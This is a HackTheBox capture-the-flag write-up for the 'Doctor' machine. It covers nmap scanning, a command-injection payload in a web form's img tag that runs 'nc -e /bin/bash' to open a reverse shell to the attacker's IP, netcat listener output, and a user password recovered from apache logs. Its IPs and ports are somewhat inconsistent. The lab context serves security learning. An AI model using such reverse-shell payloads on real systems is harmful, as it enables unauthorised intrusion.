Doctor 10.10.10.209
Got User on 5 Jan 2020

Background

Dictor is a Linux machine from HackTheBox. A web application was hosted at this server which had the XSS vulnerability. The initial access was got when submitted a reverse shell XSS payload. A password changing record was found at the web server log, the user flag got.
Target Machine: 10.10.10.209
Attacker Machine: 10.10.14.16

Hacking Process Part 0 – Service Scanning

Quick Pre-searching

nmap -p- -T5 --min-rate=1000 10.10.10.209-oG fkclai.nmap

Details Analysis

nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.10.209 -o nmap-result.txt

Enumeration strategies

  1. 1.
    Check Website Vulnerability
  2. 2.
    Check any hidden files/folders of the website
  3. 3.
    Check the website

Hacking Process Part 1 – Enumeration

Visit the website and read the page source, it was found that the doctor.htb should be included in the host table before further enumeration.
A login page was found by visiting the http://doctors.htb
Tried using gobuster and dirb to find another hidden fold, but the result is negative. Nikto also does not has any good news.
Finally, registered a user account and enumerate the inside. It was found that there was an XSS vulnerability at the POST message form.
After several tried, this payload was used to get the reverse shell
1
< img src = http://10.10.14.26:8888/$(nc.traditional$IFS-e$IFS/bin/bash$IFS ' 10.10.17.216 '$ IFS ' 6666 ')>
2
Copied!
1
[email protected]:~/Documents/ctf/htb/linux/19-HTB-doctor# nc -nvlp 1234
2
listening on [any] 6666 ...
3
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.209] 38714
4
whoami
5
web
6
python3 -c 'import pty;pty .spawn("/bin/bash")'
8
[email protected]:~$ cd /home/
9
10
shaun web
11
[email protected]:/home$ cd shaun/
12
[email protected]:/home/shaun$ ls
13
user.txt
14
[email protected]:/home/ shaun$ cat user.txt
15
cat: user.txt: Permission denied
16
[email protected]:/home/shaun$
Copied!

Hacking Process Part 2 – Gaining Foothold

After the user account "Shaun" was found that saved the user.txt, focusing the enumeration of this account. Finally, visited the apache2 log, there was a password reset process of this account Shaun was found at the acess.log. The password of this user account shaun is Guitar123
sudo this user account, the user flag was found.
Last modified 11mo ago